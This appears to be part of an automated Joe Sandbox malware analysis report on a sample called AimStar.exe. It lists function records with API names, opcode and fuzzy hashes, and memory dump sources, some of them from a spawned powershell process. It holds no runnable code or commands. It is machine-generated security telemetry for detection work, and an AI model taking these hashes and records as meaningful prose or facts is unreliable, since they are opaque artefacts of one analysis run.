                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: BINARY$no such collation sequence: %s
                                                                                                                                                                                                                                          • API String ID: 2830847230-2451720372
                                                                                                                                                                                                                                          • Opcode ID: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
                                                                                                                                                                                                                                          • Instruction ID: 8ff0e36f74f8f2ef05bceb3b3b2ec28c06c77b6d84ef95eddedef28b91ec4118
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36039a166d4566c31a86ab3c78b31d94099c0d7d54d1d41b2e9264962882269a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA71D622A4AB4165EF18AF2185483B9A392FF54BE8F485331DE6D072C5DF3CE191C364
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: index '%q'
                                                                                                                                                                                                                                          • API String ID: 0-1628151297
                                                                                                                                                                                                                                          • Opcode ID: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
                                                                                                                                                                                                                                          • Instruction ID: 4e569c75d53d9ac6be6c523d3dfc60e28a4a6e62f0263c508ccd5c6eea2b219b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83d82f952d34810ecc43121b50ff9fb09ba70e6d899240e5dfbbe69747771c2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5671CD32B0A645AEEB108B65D4447BD3BA2FB44BD8F000635DE2E57B89EF38D441C728
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %02d
                                                                                                                                                                                                                                          • API String ID: 2830847230-896308400
                                                                                                                                                                                                                                          • Opcode ID: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
                                                                                                                                                                                                                                          • Instruction ID: 9c1e9b2f82deea932e65ed08e59acebb87fc6dbce0013c9c398957d3ec37d226
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08179e3aae8af29205a3e48a38053d8be4b8d1364f403436d80ec9c05871a375
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E71E132A59692A5E768CF64E4407FD7760FB847C8F105031DE8D17A49DF39E845CB14
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                          • Instruction ID: c12f4a4090ee76b10519ae58c5fd535dcff11de2ede003b17cb943a543ac468a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA412716A0CB8241FB20AB25D40A37AF6A8EB80FB4F944235EE5C17BD5DE3CE449C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F590B6
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: HeapFree.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF710F4CC15), ref: 00007FF710F590D4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\AimStar.exe
                                                                                                                                                                                                                                          • API String ID: 3580290477-2254353971
                                                                                                                                                                                                                                          • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                          • Instruction ID: ef3b490f048f8a329f2fa1bfcd24d8d1d66c579bc2926647535106b817b576ca
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54418F36A0CF1686EB58BF2598420BCA7A8EF457E0B954035E94E43B85DE3CF589C360
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction ID: 6842dd85322821adde2f1955d3994eac806af9e481abc1da1606909e1ef9477a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9841C332B1CA4585DB609F25E4453AAA7B4FB887A4F804131EE4EC7788EF3CE505C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                          • Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                          • Instruction ID: 89ac80d5289822b82ddf2ab77d10cbd3a83d44d7a06f022864e139933ba404c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4221D522A0CA8182EB20AB15D04626EB3B9FB84B54FD54035DA8D43794DF7CFA4DCB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                          • Instruction ID: e56dc178e188a9fdc7249747efffc83fafe547be828e979c5e87751b2456d957
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD113A32608B8582EB219B15E40425AB7E8FB88BA4F984230DE8D47765EF3CD559CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                          • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                          • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                          • Instruction ID: 3c52e08cedf941c1ae9b1750b3696222e2ae38ee0496ff96ed257582475d87fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB017126A1CA0685F720BF60946727EA3B4EF49728FD40036E54D82791DE2CF548CA24
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$System$File
                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                          • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                          • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                          • Instruction ID: f372fa93ea2cbd4783936a7bc623a0a44a6f3c69a564ab6baf0a3210ebdc0873
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901DBE2B19A8556EB64DF25F84119567A0FBCC7C4B44D032E65DCBB59EE2CD2018740
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9c4dbabb3a899e34f98406c98b6033d51d44eba1a33e538ef7a97adc19271e4e
                                                                                                                                                                                                                                          • Instruction ID: 749ee41d4a032aaf6167dea6e9634e28c4191140318d019756891c2e644ea798
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c4dbabb3a899e34f98406c98b6033d51d44eba1a33e538ef7a97adc19271e4e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26525721E0DBD99FEB96A72D58551B97FE2EF67250B0901FBC14CC7193ED18AC0A8342
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 621cc376beaf540c169d57b289c5024c1f27948f2c96a95b62ecb2c6a82354d9
                                                                                                                                                                                                                                          • Instruction ID: f1ca48200cdf74829f7d9da18d47210eae6c4ab59a3a38bbb42315cf87f65de4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 621cc376beaf540c169d57b289c5024c1f27948f2c96a95b62ecb2c6a82354d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4FD14231D0EA9A9FEBA5AB6858545B97FE2EF27394B0800FED14DC7093DA18A801C351
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2201327713.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8475e0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a938e228acd6dbcd4f28c0296bbf6a300bf4c33de6aa8b6299bbdb86ff977f86
                                                                                                                                                                                                                                          • Instruction ID: 38070d1a9453fe038bab6c77a4220899d996a3a525ba9dd3ae777ecc8e81492e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a938e228acd6dbcd4f28c0296bbf6a300bf4c33de6aa8b6299bbdb86ff977f86
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46413062C0E3C55FD743AB7858760D87F70DF23265B1A41E7D098CE0E3EA185948C766
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0fac5dbb096f9fe0c8a139559a8a6af3cdf1d15de64e5e03eabecf819487cf67
                                                                                                                                                                                                                                          • Instruction ID: 60bdfe6d01c40d6d4e6c5bcb1141cd6227daabc83bbc6259ec079ec0ff7e6132
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fac5dbb096f9fe0c8a139559a8a6af3cdf1d15de64e5e03eabecf819487cf67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71515F32E0DE568FEB99E62C94512787BD2EFA6390B1801BAC74DC7197DE25EC0583C1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2201327713.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8475e0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 474f776dbf413815f4cefaf6f31b3d0f76f7c2b80fc0ebf1f36e72c38774646f
                                                                                                                                                                                                                                          • Instruction ID: 4a29ca5f8e70120202090c18f8b9fa1cb54d587f43b8dffc095932bd8c7eb607
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 474f776dbf413815f4cefaf6f31b3d0f76f7c2b80fc0ebf1f36e72c38774646f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5531D57191CB888FDB189B5C9C066B97BF0FB99710F00426FE459D3292CA75A855CBC3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2199297216.00007FF8474CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8474CD000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8474cd000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 65829becc7098936143e2b2f05ef3a42cfd69622f761730171901d3a2eb5b011
                                                                                                                                                                                                                                          • Instruction ID: c8f02c1cdebea64c927971e32bb462dcec54edbafa0832c6c96658f07c7c5752
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65829becc7098936143e2b2f05ef3a42cfd69622f761730171901d3a2eb5b011
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D141477180DBC49FE7569B399841A623FF0EF42360B1601DFD088CB1A7D629A846C7A2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2201327713.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8475e0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 57a9c0e2f73a31814792c4cf3849d5eca8d00d23f7527a3440a8ccd2aa85d9c4
                                                                                                                                                                                                                                          • Instruction ID: e8c77befe68502e6599b9e170ca4dea6ec6b0365fa993b021e6c54e1e8812648
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57a9c0e2f73a31814792c4cf3849d5eca8d00d23f7527a3440a8ccd2aa85d9c4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1931487180CB8C8FEB59DF689C4A6E97FE0EF66321F04416FC088C7153CA685806CB51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2203249433.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8476b0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5ade077a9f2f2232da774fd0526af5d261f591502f3b9d88223f1a36126f7d34
                                                                                                                                                                                                                                          • Instruction ID: b1ff2861c63170c9d154cc27e7c94e81837816d556999c439f5fb2ebceda7091
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ade077a9f2f2232da774fd0526af5d261f591502f3b9d88223f1a36126f7d34
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17210932E0DA57CFEBA9E62C94511787BD2EF6639075901B9CB4DC3193CE28EC048381
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2201327713.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff8475e0000_powershell.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                          • Instruction ID: b9bf22d125422fe50aac5e9c262cb6e3591dd9766d4fd93a4ee8e67d0f6c4c54
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7001677111CB0C8FD744EF0CE451AA5B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                                                                                                                                                                                                                          Memory Dump Source
